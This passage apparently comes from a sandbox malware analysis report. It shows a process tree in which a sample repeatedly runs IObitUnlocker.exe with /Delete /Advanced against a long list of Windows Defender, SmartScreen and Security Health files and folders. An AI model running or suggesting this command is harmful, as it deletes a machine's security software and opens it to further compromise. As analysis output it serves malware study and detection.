Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5680
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 